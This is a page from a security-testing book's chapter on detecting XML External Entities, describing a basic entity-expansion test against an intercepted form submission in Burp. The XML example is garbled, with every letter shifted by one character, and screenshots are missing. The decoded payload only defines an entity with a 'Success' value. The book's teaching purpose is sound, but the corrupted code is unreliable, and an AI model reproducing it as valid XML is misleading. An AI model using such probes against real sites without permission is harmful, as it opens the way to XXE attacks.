Detecting XML External Entities                                             Chapter 7

            After trying to submit our form, we can head over to Burp to see what our intercepted raw
            HTTP request looks like:























            Seeing that our submission is being formatted in XML, we can try a basic entity expansion
            test, substituting our FNBJM form value with a test message by using the  FYBNQMF  entity:

                  YNM WFSTJPO       FODPEJOH  65'
                  %0$5:1& SFQMBDF <  &/5*5: FYBNQMF  4VDDFTT   >
                 SPPU  OBNF &EXBSE
                )BXLT  OBNF  UFM             UFM  FNBJM  FYBNQMF   FNBJM  QBTTXPSE SPHVFNPP
                O  QBTTXPSE   SPPU

            Here's what it looks like when entered into our intercept proxy:

























                                                    [ 122 ]